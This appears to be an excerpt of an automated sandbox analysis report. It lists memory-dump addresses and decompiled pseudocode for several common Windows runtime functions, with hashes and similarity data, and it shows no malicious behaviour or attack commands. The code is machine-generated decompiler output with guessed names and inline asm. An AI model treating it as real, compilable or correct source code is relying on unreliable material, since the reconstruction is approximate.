                                                        0x048aefc4
                                                        0x048aefc4
                                                        0x048aefca
                                                        0x048aefd0
                                                        0x048af0a6
                                                        0x00000000
                                                        0x00000000
                                                        0x048af0af
                                                        0x048fbb06
                                                        0x048fbb0a
                                                        0x048af0b5
                                                        0x048af0b5
                                                        0x048af0b5
                                                        0x048af0b5
                                                        0x00000000
                                                        0x048aefd6
                                                        0x048aefd9
                                                        0x048af0de
                                                        0x048af0e2
                                                        0x048aefdf
                                                        0x048aefdf
                                                        0x048aefdf
                                                        0x048aefe5
                                                        0x048fbafc
                                                        0x048fbafc
                                                        0x048aefe5
                                                        0x048aefeb
                                                        0x048aefed
                                                        0x048af00f
                                                        0x048af011
                                                        0x048af01a
                                                        0x048af01d
                                                        0x048af021
                                                        0x048af028
                                                        0x048af029
                                                        0x048af029
                                                        0x048af02c
                                                        0x00000000
                                                        0x048af02c
                                                        0x048aeff3
                                                        0x048aeff9
                                                        0x048af0ea
                                                        0x048af0ed
                                                        0x048af0ef
                                                        0x00000000
                                                        0x048af0ef
                                                        0x048af003
                                                        0x048fbb12
                                                        0x048af045
                                                        0x048af049
                                                        0x048af051
                                                        0x048af09e
                                                        0x048af0a0
                                                        0x048af0a0
                                                        0x048af09e
                                                        0x048af053
                                                        0x048af064
                                                        0x048af064
                                                        0x048af06b
                                                        0x048fbb1a
                                                        0x048fbb1a
                                                        0x048af071
                                                        0x048af071
                                                        0x048af07d
                                                        0x048af082
                                                        0x048af08f
                                                        0x048af08f
                                                        0x048af009
                                                        0x048af00d
                                                        0x00000000
                                                        0x048af00d
                                                        0x048aefd0
                                                        0x048aef97
                                                        0x048aefa5
                                                        0x048aefaa
                                                        0x00000000
                                                        0x048aefac
                                                        0x048aefac
                                                        0x048aefac
                                                        0x00000000
                                                        0x048aefb2
                                                        0x048af036
                                                        0x048af03a
                                                        0x048af040
                                                        0x048af090
                                                        0x00000000
                                                        0x048af092
                                                        0x048af042
                                                        0x00000000
                                                        0x048af042
                                                        0x048aefb7
                                                        0x048aefb9
                                                        0x048aefbc
                                                        0x048aefb0
                                                        0x048aefb0
                                                        0x00000000
                                                        0x048aefbe
                                                        0x048aefbe
                                                        0x048aefc1
                                                        0x00000000
                                                        0x048aefc1
                                                        0x048aefbc
                                                        0x048aefaa
                                                        0x048aef91

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                        • Instruction ID: eeda3c95c74fba69dfaf8eae7263053407c6302ab7500f0b7005e0567641dcf1
                                                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                        • Instruction Fuzzy Hash: 8B51E330A046499FEB10CF68C0907AEBBB1EF05318F188BA8CB45D7281D3B5B9A9D751
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0496740D, Relevance: .1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E0496740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E048ED4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E048DF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L048B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L048B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E048DF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L048B4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                        0x0496740d
                                                        0x0496740d
                                                        0x04967412
                                                        0x04967413
                                                        0x04967416
                                                        0x04967418
                                                        0x0496741c
                                                        0x0496741f
                                                        0x04967422
                                                        0x04967422
                                                        0x04967428
                                                        0x0496742a
                                                        0x0496742a
                                                        0x04967451
                                                        0x04967432
                                                        0x0496744f
                                                        0x0496744f
                                                        0x00000000
                                                        0x04967434
                                                        0x04967438
                                                        0x04967443
                                                        0x04967517
                                                        0x04967517
                                                        0x0496751a
                                                        0x04967535
                                                        0x04967520
                                                        0x04967527
                                                        0x0496752c
                                                        0x04967531
                                                        0x04967533
                                                        0x00000000
                                                        0x04967533
                                                        0x00000000
                                                        0x04967531
                                                        0x0496754b
                                                        0x0496754f
                                                        0x0496755c
                                                        0x0496755c
                                                        0x0496755f
                                                        0x04967560
                                                        0x04967561
                                                        0x04967562
                                                        0x04967563
                                                        0x04967568
                                                        0x0496756a
                                                        0x0496756c
                                                        0x0496756d
                                                        0x0496756d
                                                        0x0496756f
                                                        0x04967572
                                                        0x04967574
                                                        0x04967577
                                                        0x0496757c
                                                        0x0496757f
                                                        0x00000000
                                                        0x04967551
                                                        0x04967551
                                                        0x04967551
                                                        0x04967553
                                                        0x04967553
                                                        0x04967449
                                                        0x04967449
                                                        0x0496744c
                                                        0x0496744c
                                                        0x00000000
                                                        0x0496744c
                                                        0x04967443
                                                        0x0496750e
                                                        0x04967514
                                                        0x04967514
                                                        0x04967455
                                                        0x04967469
                                                        0x0496746d
                                                        0x00000000
                                                        0x04967473
                                                        0x04967473
                                                        0x04967476
                                                        0x04967480
                                                        0x04967484
                                                        0x0496748e
                                                        0x04967493
                                                        0x04967493
                                                        0x04967496
                                                        0x04967499
                                                        0x049674a1
                                                        0x049674b1
                                                        0x049674b5
                                                        0x00000000
                                                        0x049674bb
                                                        0x049674c1
                                                        0x049674c1
                                                        0x049674c4
                                                        0x049674c5
                                                        0x049674c6
                                                        0x049674c7
                                                        0x049674c8
                                                        0x049674cd
                                                        0x00000000
                                                        0x049674d3
                                                        0x049674d3
                                                        0x049674d6
                                                        0x049674d8
                                                        0x049674db
                                                        0x049674dd
                                                        0x049674e0
                                                        0x049674e7
                                                        0x049674ee
                                                        0x049674ee
                                                        0x049674f4
                                                        0x049674f9
                                                        0x00000000
                                                        0x049674fb
                                                        0x049674fb
                                                        0x049674fd
                                                        0x04967500
                                                        0x04967503
                                                        0x04967505
                                                        0x04967505
                                                        0x049674f9
                                                        0x00000000
                                                        0x049674cd
                                                        0x049674b5
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                        • Instruction ID: 016817c4f5c8d479cb37256b95fbed9d836d32f4521382e92f6cac382d9308cf
                                                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                        • Instruction Fuzzy Hash: B6516C71600606EFDB15CF58C580A96BBBAFF45308F1585FAE909DF212E371E945CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C2990, Relevance: .1, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 97%
                                                        			E048C2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x496ff00);
				E048ED08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x4871664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E048DE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x4871668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E049151BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x487166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E048C2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E048A6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E048C2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E048AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E048C2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E048C2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E048C2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E048ED0D1(_t62);
				goto L28;
			}





















                                                        0x048c2990
                                                        0x048c2992
                                                        0x048c2997
                                                        0x048c29a3
                                                        0x048c29a6
                                                        0x048c29ab
                                                        0x048c29ad
                                                        0x048c29b2
                                                        0x04905c80
                                                        0x048c29b8
                                                        0x048c29b8
                                                        0x048c29bb
                                                        0x048c29c0
                                                        0x048c29c5
                                                        0x048c29c6
                                                        0x048c29c6
                                                        0x048c29cb
                                                        0x00000000
                                                        0x00000000
                                                        0x048c29cd
                                                        0x048c29d0
                                                        0x048c29d9
                                                        0x048c29db
                                                        0x048c29dd
                                                        0x048c2a7f
                                                        0x048c2a84
                                                        0x048c2a87
                                                        0x048c2a89
                                                        0x04905ca1
                                                        0x04905ca3
                                                        0x00000000
                                                        0x048c2a8f
                                                        0x048c2a8f
                                                        0x00000000
                                                        0x048c2a8f
                                                        0x00000000
                                                        0x048c29e3
                                                        0x048c29e3
                                                        0x048c29e3
                                                        0x00000000
                                                        0x048c29e3
                                                        0x048c29dd
                                                        0x00000000
                                                        0x048c29db
                                                        0x048c29e6
                                                        0x048c29e9
                                                        0x048c29eb
                                                        0x048c29ed
                                                        0x048c29f3
                                                        0x048c29f5
                                                        0x048c29f8
                                                        0x048c29fa
                                                        0x048c2a97
                                                        0x048c2a9a
                                                        0x048c2a9d
                                                        0x048c2add
                                                        0x00000000
                                                        0x048c2a9f
                                                        0x048c2aa2
                                                        0x048c2aa5
                                                        0x048c2aa8
                                                        0x048c2aab
                                                        0x04905cab
                                                        0x04905caf
                                                        0x04905cc5
                                                        0x04905cda
                                                        0x04905cdc
                                                        0x04905cdf
                                                        0x04905ce5
                                                        0x00000000
                                                        0x04905ceb
                                                        0x04905ced
                                                        0x04905cee
                                                        0x00000000
                                                        0x04905cee
                                                        0x04905cb1
                                                        0x04905cb4
                                                        0x04905cb9
                                                        0x04905cbb
                                                        0x00000000
                                                        0x04905cbd
                                                        0x04905cbd
                                                        0x00000000
                                                        0x04905cbd
                                                        0x04905cbb
                                                        0x048c2ab1
                                                        0x048c2ab1
                                                        0x048c2ac4
                                                        0x048c2ac6
                                                        0x048c2ac6
                                                        0x00000000
                                                        0x048c2ac6
                                                        0x048c2aab
                                                        0x00000000
                                                        0x048c2a00
                                                        0x048c2a09
                                                        0x048c2a0e
                                                        0x048c2a21
                                                        0x048c2a24
                                                        0x048c2a35
                                                        0x048c2a3a
                                                        0x048c2a3d
                                                        0x048c2a42
                                                        0x048c2a59
                                                        0x048c2a59
                                                        0x048c2a5c
                                                        0x048c2a5f
                                                        0x048c2a5f
                                                        0x048c29fa
                                                        0x048c29f3
                                                        0x048c2a64
                                                        0x048c2a64
                                                        0x048c2a6b
                                                        0x048c2a6b
                                                        0x048c2a6d
                                                        0x048c2a72
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8eda612a6a4c9efa394f8af563872faa0777bf10fa69d166f48679bcbcbfbab6
                                                        • Instruction ID: b1a2854be17f07e94e3bcabfab6927d5b1095e14a4b413fb0a43d0b8b47b680f
                                                        • Opcode Fuzzy Hash: 8eda612a6a4c9efa394f8af563872faa0777bf10fa69d166f48679bcbcbfbab6
                                                        • Instruction Fuzzy Hash: 71515C71E00219EFDF25DF59C840A9EBBB5BF48314F058699E801AB290D371ED92DF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C4D3B, Relevance: .1, Instructions: 131COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E048C4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x498d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E048DFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4987bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E048DB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L048B4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0489CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E048DB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E048DF380(_t67 + 0xc, 0x4875138, 0x10) == 0) {
								 *0x49860d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E048C4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E048C4E70(0x49886b0, 0x48c5690, 0, 0) != 0) {
					_t46 = E0489CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                        0x048c4d3b
                                                        0x048c4d4d
                                                        0x048c4d53
                                                        0x048c4d58
                                                        0x048c4d65
                                                        0x048c4d6c
                                                        0x048c4d71
                                                        0x048c4d77
                                                        0x048c4d7f
                                                        0x048c4d8c
                                                        0x048c4d8e
                                                        0x048c4dad
                                                        0x048c4db0
                                                        0x048c4db7
                                                        0x048c4db8
                                                        0x048c4db9
                                                        0x048c4dba
                                                        0x048c4dbb
                                                        0x048c4dc1
                                                        0x048c4dc8
                                                        0x048c4dcc
                                                        0x048c4dd5
                                                        0x048c4dde
                                                        0x048c4ddf
                                                        0x048c4de0
                                                        0x048c4de1
                                                        0x048c4de6
                                                        0x048c4de7
                                                        0x048c4de9
                                                        0x048c4df3
                                                        0x00000000
                                                        0x00000000
                                                        0x04906c7c
                                                        0x04906c8a
                                                        0x04906c8a
                                                        0x04906c9d
                                                        0x04906ca7
                                                        0x04906cac
                                                        0x04906cb2
                                                        0x04906cb9
                                                        0x00000000
                                                        0x04906cbf
                                                        0x04906cbf
                                                        0x00000000
                                                        0x04906cbf
                                                        0x04906cb9
                                                        0x048c4dfb
                                                        0x04906ccf
                                                        0x04906cd3
                                                        0x048c4e32
                                                        0x048c4e39
                                                        0x04906ce0
                                                        0x04906cf2
                                                        0x04906cf2
                                                        0x04906ce0
                                                        0x048c4e3f
                                                        0x048c4e41
                                                        0x048c4e51
                                                        0x048c4e51
                                                        0x048c4e03
                                                        0x048c4e03
                                                        0x048c4e09
                                                        0x048c4e0f
                                                        0x048c4e57
                                                        0x00000000
                                                        0x00000000
                                                        0x048c4e1b
                                                        0x048c4e30
                                                        0x048c4e5b
                                                        0x048c4e5b
                                                        0x00000000
                                                        0x048c4e30
                                                        0x048c4e11
                                                        0x048c4e11
                                                        0x048c4e16
                                                        0x00000000
                                                        0x048c4e16
                                                        0x048c4e01
                                                        0x00000000
                                                        0x048c4e01
                                                        0x048c4da5
                                                        0x04906c6b
                                                        0x00000000
                                                        0x048c4dab
                                                        0x048c4dab
                                                        0x00000000
                                                        0x048c4dab

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d6a7c62912881fd660882035ed4de529c628487aaedbd5c393d8997f87648d2a
                                                        • Instruction ID: c053062cdc0a8a5b99247be92c0f84049d180792e432ffd7ea6501b4d5ef5bb1
                                                        • Opcode Fuzzy Hash: d6a7c62912881fd660882035ed4de529c628487aaedbd5c393d8997f87648d2a
                                                        • Instruction Fuzzy Hash: 6641E771A40318AFEB21DF18CD90F6677A9EB44B14F054AADE945DB280D7B4FD80CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C4BAD, Relevance: .1, Instructions: 131COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 85%
                                                        			E048C4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x498d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0489CC50(_t86);
					L11:
					return E048DB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x4988504
				E048B2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E048DFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E048DB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L048B4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0489CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x4988504
								E048AFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E048C4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                        0x048c4bad
                                                        0x048c4bbf
                                                        0x048c4bc2
                                                        0x048c4bc6
                                                        0x048c4bcd
                                                        0x048c4bd9
                                                        0x049067fe
                                                        0x04906800
                                                        0x048c4ccc
                                                        0x048c4ccd
                                                        0x048c4cb7
                                                        0x048c4cc9
                                                        0x048c4cc9
                                                        0x048c4bdf
                                                        0x048c4be5
                                                        0x00000000
                                                        0x00000000
                                                        0x048c4beb
                                                        0x048c4bef
                                                        0x00000000
                                                        0x00000000
                                                        0x048c4bf5
                                                        0x048c4bf9
                                                        0x048c4c06
                                                        0x048c4c0b
                                                        0x048c4c17
                                                        0x048c4c1c
                                                        0x048c4c1f
                                                        0x048c4c25
                                                        0x048c4c33
                                                        0x048c4c3d
                                                        0x048c4c40
                                                        0x048c4c43
                                                        0x048c4c47
                                                        0x048c4c4d
                                                        0x048c4c53
                                                        0x048c4c54
                                                        0x048c4c55
                                                        0x048c4c56
